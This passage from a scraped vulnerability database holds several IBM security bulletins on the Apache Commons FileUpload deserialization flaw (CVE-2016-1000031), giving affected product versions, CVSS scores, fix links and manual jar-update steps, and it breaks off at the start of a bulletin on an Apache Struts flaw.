V8.5.0.2\n\n\\- IBM Business Process Manager V8.5.5.0\n\n\\- IBM Business Process Manager V8.5.6.0 through V8.5.6.0 CF2\n\n\\- IBM Business Process Manager V8.5.7.0 through V8.5.7.0 Cumulative Fix 2017.06\n\n\\- IBM Business Process Manager V8.6.0.0 through V8.6.0.0 Cumulative Fix 2018.03\n\n\\- IBM Business Automation Worfklow V18.0.0.0\n\n\\- IBM Business Process Manager Enterprise Service Bus V8.6.0.0\n\n\\- WebSphere Enterprise Service Bus V7.0.0.0 through V7.0.0.5\n\n\\- WebSphere Enterprise Service Bus Registry Edition V7.0.0.0 through V7.0.0.5\n\n\\- WebSphere Enterprise Service Bus V7.5.0.0 through V7.5.1.2\n\n\\- WebSphere Enterprise Service Bus Registry Edition V7.5.0.0 through V7.5.1.2\n\n\\- WebSphere Process Server V7.0.0.0 through V7.0.0.5\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the Interim Fix (iFix) or Cumulative Fix (CF) containing APAR [JR58572](<http://www-01.ibm.com/support/docview.wss?uid=swg1JR58572>)[ ](<https://www.ibm.com/support/docview.wss?uid=swg1JR58611>)as soon as practical:\n\n * [IBM Business Automation Workflow](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Automation+Workflow&release=All&platform=All&function=aparId&apars=JR58572>)\n * [IBM Business Process Manager](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager&release=All&platform=All&function=aparId&apars=JR58572>)\n * [IBM Business Process Manager Advanced](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=aparId&apars=JR58572>)\n * [IBM Business Process Manager Standard](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=aparId&apars=JR58572>)\n * [IBM Business Process Manager Express](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=aparId&apars=JR58572>)\n * WebSphere Process Server\n * WebSphere Enterprise Service Bus (including WESB Registry Edition)\n\n \nIBM Business Process Manager also needs [JR58611](<http://www-01.ibm.com/support/docview.wss?uid=swg1JR58611>):\n\n * [IBM Business Process Manager](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager&release=All&platform=All&function=aparId&apars=JR58611>) (including IBM BPM ESB)\n * [IBM Business Process Manager Advanced](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=aparId&apars=JR58611>)\n * [IBM Business Process Manager Standard](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=aparId&apars=JR58611>)\n * [IBM Business Process Manager Express](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=aparId&apars=JR58611>)\n\nWebSphere Application Server is shipped as a component of IBM Business Process Manager, WebSphere Process Server and WebSphere Enterprise Service Bus. WebSphere Application Server Liberty is shipped as a component of the optional BPM component Process Federation Server. Please consult the security bulletin\n\n * [Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www-01.ibm.com/support/docview.wss?uid=swg22011428&myns=swgws&mynp=OCSSEQTP&mync=E&cm_sp=swgws-_-OCSSEQTP-_-E>)\n\nfor vulnerability details and information about fixes for WebSphere Application Server and WebSphere Application Server Liberty. \n \nBecause IBM Business Process Manager V7.5, V8.0 and WebSphere Process Server V7.0 are out of general support, fixes for V7.0, V7.5, V8.0 for these products and WebSphere Enterprise Service Bus V7.0 and V7.5 and WebSphere Enterprise Service Bus Registry Edition V7.0 and V7.5 can be requested from IBM support by eligible customers.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T19:29:07", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache Commons FileUpload might affect IBM Business Process Manager, WebSphere Process Server, and WebSphere Enterprise Service Bus (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-09-15T19:29:07", "id": "3029F9535BE20D2A199498B065F599F47A44CCD33B224D2192F5AE06C62BEDAF", "href": "https://www.ibm.com/support/pages/node/298533", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:52:20", "description": "## Summary\n\nA vulnerability in Apache Commons FileUpload affects IBM Spectrum Control (formerly Tivoli Storage Productivity Center). Apache Commons FileUpload, as used in IBM Websphere Liberty and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. IBM Spectrum Control and Tivoli Storage Productivity Center have addressed the applicable CVE. \n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Spectrum Control 5.2.8 through 5.2.15.2 \nTivoli Storage Productivity Center 5.2.0 through 5.2.7.1 \n\n## Remediation/Fixes\n\nThe solution is to apply an appropriate IBM Spectrum Control (formerly Tivoli Storage Productivity Center) fix maintenance for each named product. Follow the link below, select the correct product version. Click on the download link and follow the Installation Instructions. The solution should be implemented as soon as practicable. \n \n_Starting with 5.2.8, Tivoli Storage Productivity Center has been renamed to IBM Spectrum Control._\n\n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n \n \n**_IBM Spectrum Control 5.2.x and Tivoli Storage Productivity Center 5.2.x_** \n \n**Release**| **First Fixing VRM Level**| **Link to Fix/Fix Availability Target** \n---|---|--- \n5.2.x| 5.2.16| [_http://www.ibm.com/support/docview.wss?uid=swg21320822_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>) \n \n\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T19:27:34", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload affects IBM Spectrum Control and Tivoli Storage Productivity Center (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-02-22T19:27:34", "id": "245FEAF3E7F9444B5958781DC69E3F6A353E5088DBEDBC2BC099CD2EDEC0625E", "href": "https://www.ibm.com/support/pages/node/305113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:42", "description": "## Summary\n\nIBM Case Manager may be vulnerable to Apache Commons FileUpload code execution attacks.\n\n## Vulnerability Details\n\n**CVEID**: [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION**: Apache Commons FileUpload, as used in certain products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThis vulnerability affects the following versions and releases: \n\n * IBM Case Manager 5.1.1.0 - 5.1.1.4\n * IBM Case Manager 5.2.0.0 - 5.2.0.4\n * IBM Case Manager 5.2.1.0 - 5.2.1.7\n * IBM Case Manager 5.3.0.0\n * IBM Case Manager 5.3.1.0\n\n## Remediation/Fixes\n\n**_Product_**\n\n| \n\n**_VRMF_**\n\n| \n\n**_APAR_**\n\n| \n\n**_Remediation/First Fix_** \n \n---|---|---|--- \n_IBM Case Manager_| _5.3.0.0 - 5.3.1.0_| _PJ45083_| _5.3.2.0-ICM or later versions_ \n_IBM Case Manager_| _5.2.1.0 - 5.2.1.7_| _PJ45082_| _5.2.1.7-ICM-IF002__ or later versions_ \n_IBM Case Manager_| _5.2.0.0 - 5.2.0.4_| _PJ45081_| [_5.2.0.4-ICM-IF002_](<https://www-945.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.2.0.4-ICM-IF002&continue=1>)_or later versions_ \n_IBM Case Manager _| _5.1.1.0 - 5.1.1.4_| _PJ45077_| [_5.1.1.4-ICM-IF001_](<https://www-945.ibm.com/support/fixcentral/swg/doSelectFixes?options.selectedFixes=5.1.1.4-ICM-IF001&continue=1>)_or later versions_ \n \n## Workarounds and Mitigations\n\nThe Apache Commons FileUpload jar file, which is installed by IBM Case Manager (ICM), can be manually updated to the latest version to mitigate the security vulnerability. \n\nBelow are the manual instructions on how to update the Apache Common FileUpload jar file with the respective ICM releases.\n\n1) Download the new Apache Commons FileUpload binary from Apache:\n\n \n<https://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi>\n\n2) Extract the contents and locate the commons-fileupload-1.3.3.jar file. \n\nNote: As of the writing of the security bulletin, the latest version of FileUpload is v1.3.3.\n\n_IBM Case Manager 5.1.x release_\n\n3) Navigate to the <CaseManagement Install Folder>\\CaseWidgets\\CaseForms\\WEB-INF\\lib\n\n4) Backup and remove the current commons-fileupload-1.xx.jar\n\n5) Copy the new common-fileupload-1.3.3.jar file into the folder\n\n6) Run Case Manager Admin Client (CMAC), and open an existing profile\n\n7) Run the 'Deploy the Forms Application' task.\n\n8) Restart the application server\n\n_IBM Case Manager 5.2.x release_\n\n3) Navigate to the <CaseManagement Install Folder>\\configure\\exploded_apps\\forms\\WEB-INF\\lib\n\n4) Backup and remove the current commons-fileupload-1.xx.jar\n\n5) Copy the new common-fileupload-1.3.3.jar file into the folder\n\n6) Run Case Manager configuration tool, and open an existing profile\n\n7) Run the following tasks\n\n * Create Case Manager Application\n * Deploy the Forms Application\n \n8) Restart the application server \n\n_IBM Case Manager 5.3.x release_\n\n3) Navigate to the <CaseManagement Install Folder>\\configure\\exploded_apps\\forms\\WEB-INF\\lib\n\n4) Backup and remove the current commons-fileupload-1.xx.jar\n\n5) Copy the new common-fileupload-1.3.3.jar file into the folder\n\n6) Run Case Manager configuration tool, and open an existing profile\n\n7) Run the following tasks\n\n * Create Case Manager Applications\n * Deploy the Forms Application\n \n8) Restart the application server \n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:19:00", "type": "ibm", "title": "Security Bulletin: IBM Case Manager may be vulnerable to Apache Commons FileUpload code execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T12:19:00", "id": "5E963A16D56492D265E3AD4BB10050F73E3DA9DE70902074CA74AFF7B978ADBF", "href": "https://www.ibm.com/support/pages/node/299177", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:53:07", "description": "## Summary\n\nThere is a potential vulnerability in the Apache Commons FileUpload used by WebSphere Application Server traditional and WebSphere Application Server Liberty. \n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in several products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nThis vulnerability affects the following versions and releases of IBM WebSphere Application Server: \n\n * Liberty \n * Version 9.0\n * Version 8.5 \n * Version 8.0 \n\n## Remediation/Fixes\n\nThe recommended solution is to apply the interim fix, Fix Pack or PTF containing APARs PI90804 or PI94763 for each named product as soon as practical. \n \n**Note: There was an issue with PI90804 for WebSphere Application Server Liberty. You could encounter a Null Pointer Exception when accessing the getHeader() call during a servlet request. If you have already downloaded the interim fix for PI90804 for Liberty we recommned that you replace it with the new interim fixes for PI94763. \n \nFor WebSphere Application Server Liberty:** \n\u00b7 Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PI94763](<http://www-01.ibm.com/support/docview.wss?uid=swg24044654>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24044155>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042712>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042513>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>) \n\\--OR-- \n\u00b7 Apply Liberty Fix Pack 18.0.0.1 or later.** \n \nFor WebSphere Application Server traditional and WebSphere Application Server Hypervisor Edition:** \n** \nFor V9.0.0.0 through 9.0.0.6:** \n\u00b7 Upgrade to minimal fix pack levels as required by interim fixes and then apply Interim Fix [PI90804](<http://www-01.ibm.com/support/docview.wss?uid=swg24044445>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24044155>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042712>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042513>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24044155>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24044154>) \n\\--OR-- \n\u00b7 Apply Fix Pack 9.0.0.7 or later. ** \n** \n**For V8.5.0.0 through 8.5.5.12:** \n\u00b7 Upgrade to minimal fix pack levels as required by interim fixes and then apply Interim Fix [PI90804](<http://www-01.ibm.com/support/docview.wss?uid=swg24044445>) \n\\--OR-- \n\u00b7 Apply Fix Pack 8.5.5.13 or later. ** \n \nFor V8.0.0.0 through 8.0.0.14:** \n\u00b7 Upgrade to a minimal fix pack levels as required by interim fix and then apply Interim Fix [PI90804](<http://www-01.ibm.com/support/docview.wss?uid=swg24044445>) [](<http://www-01.ibm.com/support/docview.wss?uid=swg24043596>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042712>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24042513>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041604>)[](<http://www-01.ibm.com/support/docview.wss?uid=swg24041394>) \n\\--OR-- \n\u00b7 Apply Fix Pack 8.0.0.15 or later. \n\n## Workarounds and Mitigations\n\nnone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:08:41", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:41", "id": "6109AF1F8D1815678E61E353B816288D20DB8DD1D5C49536DF782435D85C01D2", "href": "https://www.ibm.com/support/pages/node/301027", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:43", "description": "## Summary\n\nFileNet Content Management Interoperability Services (CMIS), which is shipped with IBM Content Navigator, has addressed the following vulnerability. \nAbility to execute remote attacker\u2019s arbitrary code on a target machine by leveraging the untrusted data in DiskFileItem class of FileUpload library\n\n## Vulnerability Details\n\n**CVEID**: [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>) \n \n**DESCRIPTION**: FileNet Content Management Interoperability Services (CMIS) could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. The affected \u201cCommons FileUpload\u201d version 1.3.2 has been upgraded to the fixed version 1.3.3 \n \nCVSS Base Score: 9.8 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Content Navigator 2.0.3.8 \nIBM Content Navigator 3.0 \nIBM Content Navigator 3.0.1 \nIBM Content Navigator 3.0.2\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nIBM Content Navigator | 2.0.3.8| Download the fix ICN 2.0.3 FP8 LA 15 from IBM Fix central ([https://www.ibm.com/support/fixcentral/](<https://www-945.ibm.com/support/fixcentral/>)) ) \nIBM Content Navigator| 3.0| Download the fix ICN 3.0 LA 12 from IBM Fix central ([https://www.ibm.com/support/fixcentral/](<https://www-945.ibm.com/support/fixcentral/>)) \nIBM Content Navigator| 3.0.1| Download the fix ICN 3.0.1 LA 05 from IBM Fix central (<https://www.ibm.com/support/fixcentral/>) \nIBM Content Navigator| 3.0.2| Download the fix ICN 3.0.2 LA 02 from IBM Fix central (<https://www.ibm.com/support/fixcentral/>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:19:05", "type": "ibm", "title": "Security Bulletin: FileNet Content Management Interoperability Services (CMIS), which is shipped with IBM Content navigator, is affected by the ability to execute remote attacker\u2019s arbitrary code on a target machine vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T12:19:05", "id": "3D06AFAAD22542FA483AAC68D77E91B7A2B272972D4F386444B504CB4050B732", "href": "https://www.ibm.com/support/pages/node/300819", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T17:50:38", "description": "## Summary\n\nIBM InfoSphere Master Data Management is vulnerable to a Novell NetIQ Sentinel issue and could allow a remote attacker to execute arbitrary code on the system. \n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Novell NetIQ Sentinel could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n## Affected Products and Versions\n\nThis vulnerability is known to affect the following offerings: \n \n\n\n**Affected IBM Initiate Master Data ****Management**\n\n| \n\n**Affected Versions** \n \n---|--- \nIBM Initiate Master Data Service| \n\n10.1 \n \nIBM InfoSphere Master Data Management| \n\n11.0 \n \nIBM InfoSphere Master Data Management| \n\n11.3 \n \nIBM InfoSphere Master Data Management| \n\n11.4 \n \nIBM InfoSphere Master Data Management| \n\n11.5 \n \nIBM InfoSphere Master Data Management| \n\n11.6 \n \n## Remediation/Fixes\n\n**_Product_**** **\n\n| **_VRMF_**| **_Remediation/First Fix_** \n---|---|--- \nIBM Initiate Master Data Service | \n\n10.1\n\n| [_10.1.031518_IM_Initiate_MasterDataService_ALL_Refresh Pack_](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/InfoSphere+Master+Data+Management&release=10.1&platform=All&function=fixId&fixids=10.1.031518_IM_Initiate_MasterDataService_ALL_RefreshPack&includeSupersedes=0&source=fc>) \nIBM InfoSphere Master Data Management Standard/Advanced Edition | \n\n11.0\n\n| [_11.0.0.7-MDM-SAE-FP07IF000_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+Master+Data+Management&fixids=11.0.0.7-MDM-SAE-FP07IF000_FC&source=SAR>) \nIBM InfoSphere Master Data Management Standard/Advanced Edition | \n\n11.3\n\n| [_11.3.0.7-MDM-SE-AE-FP07IF000_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+Master+Data+Management&fixids=11.3.0.7-MDM-SE-AE-FP07IF000_FC&source=SAR>) \nIBM InfoSphere Master Data Management Standard/Advanced Edition | \n\n11.4\n\n| [_11.4.0.8-MDM-SAE-FP08IF000_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+Master+Data+Management&fixids=11.4.0.8-MDM-SAE-FP08IF000_FC&source=SAR>) \nIBM InfoSphere Master Data Management Standard/Advanced Edition | \n\n11.5\n\n| [_11.5.0.6-MDM-SE-AE-FP06IF000_](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+Master+Data+Management&fixids=11.5.0.6-MDM-SAE-FP06IF000_FC&source=SAR>) \nIBM InfoSphere Master Data Management Standard/Advanced Edition | \n\n11.6\n\n| [_11.6.0.4-MDM-SE-AE _](<www.ibm.com/support/fixcentral/quickorder?product=ibm%2FInformation+Management%2FInfoSphere+Master+Data+Management&fixids=11.6.0.4-MDM-SE-AE&source=SAR>)_ _ \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:58:00", "type": "ibm", "title": "Security Bulletin: Security vulnerability in Apache affects IBM InfoSphere Master Data Management (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2022-04-27T09:58:00", "id": "77352C82A30EA733694B5D88C0D7D12ED4F6B39811776EF99E8E73A7C6CD693F", "href": "https://www.ibm.com/support/pages/node/301939", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:52:21", "description": "## Summary\n\nAn Apache Struts vulnerability of arbitrary code execution was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) **DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. CVSS Base Score: 7.3 CVSS Temporal Score: See 